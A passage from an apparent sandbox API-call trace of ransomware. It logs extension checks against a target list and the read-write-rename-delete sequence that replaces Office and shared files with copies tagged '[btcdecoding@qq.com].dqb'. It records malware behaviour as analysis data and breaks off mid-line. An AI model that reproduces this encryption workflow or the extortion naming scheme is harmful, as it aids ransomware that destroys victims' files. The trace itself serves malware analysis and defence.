(lpString1=".pdf", lpString2=".xml") returned -1 [0035.847] lstrlenW (lpString=".xls") returned 4 [0035.847] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.847] lstrlenW (lpString=".xlsx") returned 5 [0035.847] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.847] lstrlenW (lpString=".ppt") returned 4 [0035.847] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.847] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".zip") returned 4 [0035.848] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.848] lstrlenW (lpString=".rar") returned 4 [0035.848] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString=".bz2") returned 4 [0035.848] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString=".7z") returned 3 [0035.848] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".dbf") returned 4 [0035.848] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".1cd") returned 4 [0035.848] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".jpg") returned 4 [0035.848] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".doc") returned 4 [0035.848] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString=".docx") returned 5 [0035.848] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.848] lstrlenW (lpString=".pdf") returned 4 [0035.848] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString=".xls") returned 4 [0035.848] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString=".xlsx") returned 5 [0035.848] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.848] lstrlenW (lpString=".ppt") returned 4 [0035.848] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.848] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.848] lstrlenW (lpString=".zip") returned 4 [0035.848] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.848] lstrlenW (lpString=".rar") returned 4 [0035.849] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.849] lstrlenW (lpString=".bz2") returned 4 [0035.849] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.849] lstrlenW (lpString=".7z") returned 3 [0035.849] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.849] lstrlenW (lpString=".dbf") returned 4 [0035.849] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.849] lstrlenW (lpString=".1cd") returned 4 [0035.849] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.849] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 88 [0035.849] lstrlenW (lpString=".jpg") returned 4 [0035.849] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.849] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.849] lstrlenW (lpString="Office32WW.xml") returned 14 [0035.849] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0036.181] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=4274) returned 1 [0036.187] CloseHandle (hObject=0x194) returned 1 [0036.190] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0036.196] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.198] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0036.206] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.206] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.207] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0036.207] GetLastError () returned 0x0 [0036.207] ReadFile (in: hFile=0x194, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0036.228] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0036.229] ReadFile (in: hFile=0x194, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.229] WriteFile (in: hFile=0x19c, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0036.230] SetEndOfFile (hFile=0x19c) returned 1 [0036.230] CloseHandle (hObject=0x19c) returned 1 [0036.230] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.230] SetEndOfFile (hFile=0x194) returned 1 [0036.231] CloseHandle (hObject=0x194) returned 1 [0036.231] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0036.232] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0036.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.232] lstrlenW (lpString=".doc") returned 4 [0036.232] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString=".docx") returned 5 [0036.232] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.232] lstrlenW (lpString=".pdf") returned 4 [0036.232] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString=".xls") returned 4 [0036.232] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString=".xlsx") returned 5 [0036.232] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.232] lstrlenW (lpString=".ppt") returned 4 [0036.232] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.232] lstrlenW (lpString=".zip") returned 4 [0036.232] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.232] lstrlenW (lpString=".rar") returned 4 [0036.232] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString=".bz2") returned 4 [0036.232] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString=".7z") returned 3 [0036.232] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.232] lstrlenW (lpString=".dbf") returned 4 [0036.232] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.232] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.232] lstrlenW (lpString=".1cd") returned 4 [0036.232] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".jpg") returned 4 [0036.233] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".doc") returned 4 [0036.233] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString=".docx") returned 5 [0036.233] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.233] lstrlenW (lpString=".pdf") returned 4 [0036.233] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString=".xls") returned 4 [0036.233] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString=".xlsx") returned 5 [0036.233] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.233] lstrlenW (lpString=".ppt") returned 4 [0036.233] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".zip") returned 4 [0036.233] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.233] lstrlenW (lpString=".rar") returned 4 [0036.233] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString=".bz2") returned 4 [0036.233] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString=".7z") returned 3 [0036.233] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".dbf") returned 4 [0036.233] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".1cd") returned 4 [0036.233] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.233] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0036.233] lstrlenW (lpString=".jpg") returned 4 [0036.234] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.234] lstrcmpiW (lpString1=".JPG", lpString2=".dqb") returned 1 [0036.234] lstrlenW (lpString="MS.JPG") returned 6 [0036.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.237] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1061) returned 1 [0036.237] CloseHandle (hObject=0x188) returned 1 [0036.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 0x20 [0036.238] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.238] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.238] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0036.238] GetLastError () returned 0x0 [0036.238] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x425, lpOverlapped=0x0) returned 1 [0036.240] WriteFile (in: hFile=0x194, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x430, lpOverlapped=0x0) returned 1 [0036.241] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.241] WriteFile (in: hFile=0x194, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.241] SetEndOfFile (hFile=0x194) returned 1 [0036.242] CloseHandle (hObject=0x194) returned 1 [0036.244] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.244] SetEndOfFile (hFile=0x188) returned 1 [0036.245] CloseHandle (hObject=0x188) returned 1 [0036.245] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0036.245] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.jpg")) returned 1 [0036.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.246] lstrlenW (lpString=".doc") returned 4 [0036.246] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0036.246] lstrlenW (lpString=".docx") returned 5 [0036.246] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0036.246] lstrlenW (lpString=".pdf") returned 4 [0036.246] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0036.246] lstrlenW (lpString=".xls") returned 4 [0036.246] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0036.246] lstrlenW (lpString=".xlsx") returned 5 [0036.246] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0036.246] lstrlenW (lpString=".ppt") returned 4 [0036.246] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0036.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.246] lstrlenW (lpString=".zip") returned 4 [0036.246] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0036.246] lstrlenW (lpString=".rar") returned 4 [0036.246] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0036.246] lstrlenW (lpString=".bz2") returned 4 [0036.246] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0036.247] lstrlenW (lpString=".7z") returned 3 [0036.247] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0036.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.247] lstrlenW (lpString=".dbf") returned 4 [0036.247] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0036.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.247] lstrlenW (lpString=".1cd") returned 4 [0036.247] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0036.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.247] lstrlenW (lpString=".jpg") returned 4 [0036.247] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0036.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.247] lstrlenW (lpString=".doc") returned 4 [0036.247] lstrcmpiW (lpString1=".doc", lpString2=".JPG") returned -1 [0036.247] lstrlenW (lpString=".docx") returned 5 [0036.247] lstrcmpiW (lpString1=".docx", lpString2="S.JPG") returned -1 [0036.247] lstrlenW (lpString=".pdf") returned 4 [0036.247] lstrcmpiW (lpString1=".pdf", lpString2=".JPG") returned 1 [0036.247] lstrlenW (lpString=".xls") returned 4 [0036.247] lstrcmpiW (lpString1=".xls", lpString2=".JPG") returned 1 [0036.247] lstrlenW (lpString=".xlsx") returned 5 [0036.247] lstrcmpiW (lpString1=".xlsx", lpString2="S.JPG") returned -1 [0036.248] lstrlenW (lpString=".ppt") returned 4 [0036.248] lstrcmpiW (lpString1=".ppt", lpString2=".JPG") returned 1 [0036.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.248] lstrlenW (lpString=".zip") returned 4 [0036.248] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0036.248] lstrlenW (lpString=".rar") returned 4 [0036.248] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0036.248] lstrlenW (lpString=".bz2") returned 4 [0036.248] lstrcmpiW (lpString1=".bz2", lpString2=".JPG") returned -1 [0036.248] lstrlenW (lpString=".7z") returned 3 [0036.248] lstrcmpiW (lpString1=".7z", lpString2="JPG") returned -1 [0036.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.248] lstrlenW (lpString=".dbf") returned 4 [0036.248] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0036.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.248] lstrlenW (lpString=".1cd") returned 4 [0036.248] lstrcmpiW (lpString1=".1cd", lpString2=".JPG") returned -1 [0036.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 61 [0036.248] lstrlenW (lpString=".jpg") returned 4 [0036.248] lstrcmpiW (lpString1=".jpg", lpString2=".JPG") returned 0 [0036.248] lstrcmpiW (lpString1=".PNG", lpString2=".dqb") returned 1 [0036.248] lstrlenW (lpString="MS.PNG") returned 6 [0036.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.249] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=1682) returned 1 [0036.249] CloseHandle (hObject=0x188) returned 1 [0036.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20 [0036.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0036.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0036.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.249] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0036.249] GetLastError () returned 0x0 [0036.249] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x692, lpOverlapped=0x0) returned 1 [0036.262] WriteFile (in: hFile=0x194, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x6a0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x6a0, lpOverlapped=0x0) returned 1 [0036.263] ReadFile (in: hFile=0x188, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.263] WriteFile (in: hFile=0x194, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0036.263] SetEndOfFile (hFile=0x194) returned 1 [0036.263] CloseHandle (hObject=0x194) returned 1 [0036.264] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.264] SetEndOfFile (hFile=0x188) returned 1 [0036.265] CloseHandle (hObject=0x188) returned 1 [0036.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0036.265] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0036.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 61 [0036.265] lstrlenW (lpString=".doc") returned 4 [0036.265] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0036.265] lstrlenW (lpString=".docx") returned 5 [0036.265] lstrcmpiW (lpString1=".docx", lpString2="S.PNG") returned -1 [0036.265] lstrlenW (lpString=".pdf") returned 4 [0036.265] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0036.265] lstrlenW (lpString=".xls") returned 4 [0036.265] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0036.265] lstrlenW (lpString=".xlsx") returned 5 [0036.265] lstrcmpiW (lpString1=".xlsx", lpString2="S.PNG") returned -1 [0036.265] lstrlenW (lpString=".ppt") returned 4 [0036.265] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0036.265] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 